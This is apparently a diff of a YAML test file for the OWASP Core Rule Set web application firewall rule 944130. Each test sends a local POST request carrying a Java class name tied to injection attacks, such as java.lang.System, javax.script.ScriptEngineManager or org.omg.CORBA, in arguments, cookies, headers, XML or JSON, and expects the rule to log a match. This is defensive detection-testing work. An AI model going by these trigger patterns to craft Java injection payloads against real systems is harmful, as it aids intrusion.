stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-376 - desc: "Cookie test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-377 - desc: "Cookie name includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-378 - desc: "Request header test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-379 - desc: "XML attribute value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-380 - desc: "XML element value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-381 - desc: "Nested XML element value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-382 - desc: "Content-Type text/plain includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-383 - desc: "Content-Type application/json arg value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-384 - desc: "Content-Type application/json arg name includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-385 - desc: "Argument test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-386 - desc: "Argument name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-387 - desc: "Cookie test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-388 - desc: "Cookie name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-389 - desc: "Request header test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-390 - desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-391 - desc: "XML element value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-392 - desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-393 - desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-394 - desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-395 - desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-396 - desc: "Argument test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-397 - desc: "Argument name includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-398 - desc: "Cookie test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-399 - desc: "Cookie name includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
org.apache.commons=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-400 - desc: "Request header test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-401 - desc: "XML attribute value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-402 - desc: "XML element value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - 
- - test_title: 944130-403 - desc: "Nested XML element value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-404 - desc: "Content-Type text/plain includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-405 - desc: "Content-Type application/json arg value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-406 - desc: "Content-Type application/json arg name includes keyword org.apache.commons" - 
stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-407 - desc: "Argument test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-408 - desc: "Argument name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-409 - desc: "Cookie test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-410 - desc: "Cookie name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-411 - desc: "Request header test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-412 - desc: "XML attribute value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-413 - desc: "XML element value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-414 - desc: "Nested XML element value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-415 - desc: "Content-Type text/plain includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-416 - desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-417 - desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-1 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 